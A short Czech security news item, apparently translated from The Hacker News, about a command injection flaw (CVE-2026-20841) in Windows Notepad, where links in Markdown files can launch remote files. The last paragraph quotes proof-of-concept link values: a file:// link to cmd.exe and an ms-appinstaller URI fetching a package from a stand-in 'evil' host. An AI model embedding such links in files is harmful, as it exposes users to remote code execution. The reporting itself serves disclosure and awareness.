Chyba command injection (CVE-2026-20841, CVSS skóre: 8.8) v aplikaci Notepad by mohla vést ke vzdálenému spuštění kódu.
„Nesprávná neutralizace speciálních prvků použitých v příkazu (‚command injection‘) v aplikaci Windows Notepad umožňuje neautorizovanému útočníkovi spustit kód přes síť,“ uvedl Microsoft.
Útočník by mohl tuto chybu zneužít tím, že by uživatele přiměl kliknout na škodlivý odkaz uvnitř Markdown souboru otevřeného v Notepadu, což by způsobilo, že aplikace spustí vzdálené soubory.
„Škodlivý kód by se spustil v bezpečnostním kontextu uživatele, který otevřel Markdown soubor, což by útočníkovi dalo stejná oprávnění jako tomuto uživateli,“ dodal technologický gigant.
Proof-of-concept (PoC) exploity ukazují, že zranitelnost lze spustit vytvořením Markdown souboru s odkazy „file://“, které odkazují na spustitelné soubory („file://C:/windows/system32/cmd.exe“) nebo obsahují speciální URI („ms-appinstaller://?source=https://evil/xxx.appx“) pro spuštění libovolných payloadů.
Zdroj: thehackernews.com
